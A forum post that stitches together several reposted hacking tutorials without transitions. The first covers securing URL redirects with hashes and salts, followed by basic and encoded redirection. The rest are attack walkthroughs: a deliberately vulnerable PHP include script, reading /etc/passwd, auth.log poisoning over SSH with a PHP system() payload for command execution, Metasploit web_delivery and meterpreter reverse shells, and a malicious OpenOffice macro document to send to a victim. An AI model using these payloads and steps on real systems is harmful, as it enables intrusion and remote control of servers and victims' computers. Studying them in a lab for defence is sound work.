Login

**NINZA** · 04-26-2020, 09:46 AM

0			0

In the previous article we have explained the concept of redirection with basic redirection and encoded redirections; in this article, we will cover the more secured redirection using hashing and salting techniques.
In this article also we will be covering the redirection using the same php scripts with little modification within the code.
Redirection using Hash Values
On browser type http://localhost/hashing/home.php
Hover on Redirect Link pointing to redirection page (re.php). We can see that the redirection link not only contains the URL as a parameter but also the hash which means that we are not only passing the URL as a parameter but also generating the hash value using MD5/SH1/SHA512 or any of the hashing algorithm and redirection will only work if the combination of URL and its hash is correct else not.
(Shown in the figure below). This is a more secure way of redirection.
[Image: 1.png?w=687&ssl=1]

For the sake of understanding our redirection link is showing the parameters like URL and Hash but in the case or real development, we can hide them so that attacker won’t be able to judge where the page is being redirected.
When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using MD5 hash algorithm) and compare the generated hash value with the hash value we have sent with the request, if both the hash values match the redirection would work else it will fail.
We are using a hash calculator for generating the MD5 Value of “https://www.hackingarticles.in”.
[Image: 2.png?w=687&ssl=1]

The MD5 hash value of “https://www.hackingarticles.in” is 8258c1efb05943d059476150cb22df1d
In the below image we are replacing the original hash value of “https://www.hackingarticles.in” from its original value which is “8258c1efb05943d059476150cb22df1d” to any different value for example “9258c1efb05943d059476150cb22df1d” (we have replaced only first digit from 8 to 9).
[Image: 3.png?w=687&ssl=1]

The redirection has failed and the script has returned an error message. Finally, we are sending the URL along with the generated Hash Value as parameter and result is below
[Image: 4.png?w=687&ssl=1]

Redirection using Hash Values with salting
On browser type http://localhost/hashing/home.php (the page where we have our scripts)
Hover on Redirect Link pointing to redirection page (re.php). Here we can see one more additional parameter salt. As in the previous methodology we have worked with Hash values while working with salting we are introducing one more parameter salt and generating the hash value of the URL by prepending or appending the salt value in front of the URL or at the end of the URL. The salt value could be anything, it could be a combination of characters, digits, alphanumeric, special character or anything we want (In this example we are using the salt value “ignite”). By using salts we are further increasing the security for redirecting the URL.
[Image: 5.png?w=687&ssl=1]

For the sake of understanding our redirection link is showing the parameters like URL and Hash and Salt but in the case or real development, we can hide them so that attacker won’t be able to judge where the page is being redirected.
When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using Sha1 hash algorithm) by appending the salt value (ignite) in front of the URL and compare the generated hash value with the hash value we have sent with the request, if both the hash values match the redirection would work else it will fail.
[Image: 6.png?w=687&ssl=1]

in Above image we are generating the Sha1 hash value by appending the salt “ignite” in front of the URL “https://www.hackingarticles.in” , we can use any online/offline converter in this example we are generating Sha1 hash through

[To see content please register here]

The sha1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626
[Image: 8.png?w=687&ssl=1]

If the hash value sent is different from the original value our script will return an error. In below Image we are changing the sha1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (we are replacing only first digit from 5 to 8) we will get the following result.
[Image: 9.png?w=687&ssl=1]

Finally, we are sending the URL along with the generated Hash Value as parameter and result is below
[Image: 10.png?w=687&ssl=1]

A redirect automatically sends the website’s visitors to some different location or URL; redirection could be either at a different location within the same site or a new site or webpage.
Unsecured redirection and forwarding are the outcomes when a web application accepts untrusted inputs that could cause the web application to redirect the request to a URL contained within untrusted/Unvalidated input, we can also call this type of redirection as Unvalidated Redirection.
We are demonstrating the actual concept and types of redirection through a PHP code running under apache server on a local machine running Kali Linux. We can also use wamp or xampp server for a windows machine to run and execute these codes. For executing our redirection scripts, put the codes in /var/www/html directory: This is the directory pointing to localhost (in our case).
References

[To see content please register here]

Basic Redirection
On browser type localhost/redirect/home.php
Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below. (As shown in the figure below).
[Image: 1.png?w=687&ssl=1]

When we click on this link, we will be redirected to

[To see content please register here]

, as we have coded in our redirection script (re.php).
[Image: 2.png?w=687&ssl=1]

This is the basic redirection where we are simply redirecting the users from one page to another page through php scripts without considering any security measures in the account. The further encoding parameters of redirection are explained below.
URL Encoding
On browser type localhost/hex/home.php (the page where we have our scripts)
Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below. (As shown in the figure below).
[Image: 3.png?w=687&ssl=1]

Here we are using the same script for the home page but in this redirection, we are using simple URL encoding where we can send our URL in URL Encoded format and the encoded URL is being decoded through the script running on our redirected php page(re.php in this case).
We can use any online /offline converter for calculating URL encoded value (in this example we are using

[To see content please register here]

)
Refer below screenshot for URL encoding.
[Image: 4.png?w=687&ssl=1]

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with URL encoded value we will land on the same page.
[Image: 6.png?w=687&ssl=1]

The following is the result
[Image: 7.png?w=687&ssl=1]

HEX Encoding
Here we are converting the URL in its Hexadecimal Value using Burp suite (you can use any online/offline tool).
[Image: 9.png?w=687&ssl=1]

Single Hex encoded value of

[To see content please register here]

is
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e
1
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e
Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with single hex encoded value we will land on the same page.
[Image: 10.png?w=687&ssl=1]

The following is the result
[Image: 11.png?w=687&ssl=1]

Multilevel Encoding
Here we are demonstrating the multilevel encoding where we are re-encoding the pre-encoded values.
[Image: 12.png?w=687&ssl=1]

Double Hex encoded value of

[To see content please register here]

is
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65
1
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65
Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with double hex encoded value we will land on the same page.
[Image: 13.png?w=687&ssl=1]

The following is the result
[Image: 14.png?w=687&ssl=1]

Base 64 Encoded Redirection
On browser type http://localhost/base64/home.php
Hover on Redirect Link, pointing to redirection page (re.php). Here we are pre encoding our URL to its base 64 encoded value because of which our URL is something which can’t be understandable with the naked eye.( As shown in the figure below).
[Image: 5.png?w=687&ssl=1]

Below image shows the Base64 encoding of our URL

[To see content please register here]

Base64 encoded value of

[To see content please register here]

is
aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4=
1
aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4=

The following is the output
[Image: 17.png?w=687&ssl=1]

In this article, you will learn how to make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack Please read our previous article “

[To see content please register here]

and “

[To see content please register here]

that will help you in the configuration of own web server as well as more about LFI vulnerability.
Attacker: Kali Linux
Target: Ubuntu
Let’s Begin!!
Create a PHP file which will allow the user to include a file through a file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC.
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
1
2
3
4
5
6
7
8
9
10
11
<?php
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
?>
I had saved given below PHP code inside a text file as lfi.php and saved on the desktop.
[Image: 1.1.png?w=687&ssl=1]

Now login with the user as “root” and create a folder “lfi” inside /var/www/html
cd /var/www/html
mkdir lfi
1
2
cd /var/www/html
mkdir lfi
Move the lfi.php file from desktop to /var/www/html using given below command.
mv /home/raj/Desktop/lfi.php .
1
mv /home/raj/Desktop/lfi.php .
[Image: 1.2.png?w=687&ssl=1]

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring the following URL to read password files:
localhost/lfi/lfi.php?file=/etc/passwd
1
localhost/lfi/lfi.php?file=/etc/passwd
From the given image you can observe that the above URL has dumped the following result shown below.
[Image: 1.3.png?w=687&ssl=1]

Open a terminal in your Kali Linux and connect the target through SSH service
ssh [email protected]
1
ssh [email protected]
From the screenshot, you can see I am connected with the target system.
[Image: 1.png?w=687&ssl=1]

Type following command to view its logs:
tail -f /var/log/auth.log
1
tail -f /var/log/auth.log
From given below image you can check the details of generated logs for the auth.log file.
[Image: 2.png?w=687&ssl=1]

Now I will try to open auth.log log file through lfi.php on the browser, therefore, give read and write permission to
cd /var/log/
chmod 775 auth.log
1
2
cd /var/log/
chmod 775 auth.log
[Image: 3.png?w=687&ssl=1]

Now to include the auth.log file as file parameter and give following URL inside the browser.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
1
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
From the given image you can see it is showing created auth logs in the browser also.
[Image: 4.png?w=687&ssl=1]

Since the auth.log file generates a log for every success and failed login attempt when we try to connect with the web server. Taking advantage of this feature now I will send malicious PHP code as a fake user and it will get added automatically in the auth.log file as a new log.
ssh '<?php system($_GET['c']); ?>'@192.168.1.129
1
ssh '<?php system($_GET['c']); ?>'@192.168.1.129
[Image: 5.png?w=687&ssl=1]

Again when you will check its log, you will find the PHP code has been added a new log.
Type following command to view its logs:
tail -f /var/log/auth.log
1
tail -f /var/log/auth.log
[Image: 6.png?w=687&ssl=1]

Here it will dump the data of auth log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
1
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig
[Image: 7.png?w=687&ssl=1]

If you found such kind of vulnerability in any web application then you can use Metasploit platform to exploit web server.
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.123
msf exploit (web_delivery)>set srvport 8081
msf exploit (web_delivery)>exploit
Copy the highlighted text shown in below window
[Image: 8.png?w=687&ssl=1]

Paste the above copied malicious code inside URL as shown in the given image and execute it as a command.
[Image: 9.png?w=687&ssl=1]

When the above code gets executed you will get meterpreter session 1 of the targeted web server.
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
1
2
msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo
[Image: 10.png?w=687&ssl=1]

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.
Exploit Targets
Apach Open Office on Windows
Requirement
Attacker: kali Linux
Victim PC: Windows 10
Open the terminal in kali Linux and type msfconsole to load metasploit framework.
[Image: 1.png?w=687&ssl=1]

Now type use exploit/multi/misc/openoffice_document_macro
msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp
msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (openoffice_document_macro)>set srvhost 192.168.0.104
msf exploit (openoffice_document_macro)>set lport 4444
msf exploit (openoffice_document_macro)>exploit
From the screenshot you can see the highlighted text is showing the path of malicious odt file.
[Image: 2.png?w=687&ssl=1]

The malicious odt File had been generated successfully which is stored on your local computer inside following path:
/root/.msf4/local/msf.odt
[Image: 3.png?w=687&ssl=1]

Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.
[Image: 5.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis